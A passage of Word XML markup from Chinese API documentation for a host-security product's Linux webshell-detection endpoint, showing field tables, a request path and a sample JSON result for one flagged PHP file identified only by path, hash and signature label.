            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15BC135B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B3F531D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77645D31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68AD67AD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3047717D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FD9A878" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C20D831" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3312860D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="452E4FF8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F6F5893" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>filePath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DA5DB7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EE22D50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75F14D45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CBEB955" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD8BC5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/websecurity/webshell/linux?page=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BEDE08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49588CC2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNSmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "hostname",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "id": "5a5dd69c7d761b24f3ea04c1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "type": 5,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>typeDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "已知后门",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>serverName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "www.zhn.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>filePath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/home/qt/nan/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ii.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "fileMd5": "112378feba9a9ba493a1d0bd0acfb180",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 16,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>regexDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": "PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>特征码",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>matchCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>modifyTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1505122390,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whiteRuleEffect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651CBCA0"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694"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3169"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="35DA1E9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A7D3146" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FD81A87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="307E8D8D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02093244" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FEE082B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BD45011" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B10520C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C288733" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69D79EA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3ABD5833" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39BC2680" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="021DBDEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A0B8370" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36BE39D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="493C9353" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CED82BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EBD107C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="062E22A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32F3ACE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="638DBB04" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33ECB198" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A65D0EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F0C596E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27CFA22F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="180FF481" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F4C6F67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="425AB249" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C767BA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5871928C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6883825D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3723C511" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="724BEC99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65C09819" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2897F44A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="05447833" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="182D0E91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13948FEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4561E989" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58490B54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="297AB74A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EC3F879" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F1FF96C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78B0784D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25041A89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0081A1DF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63D64A3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EEA83B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75CAD100" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00C0D395" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FAFE854" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="082B97F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B71CDAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
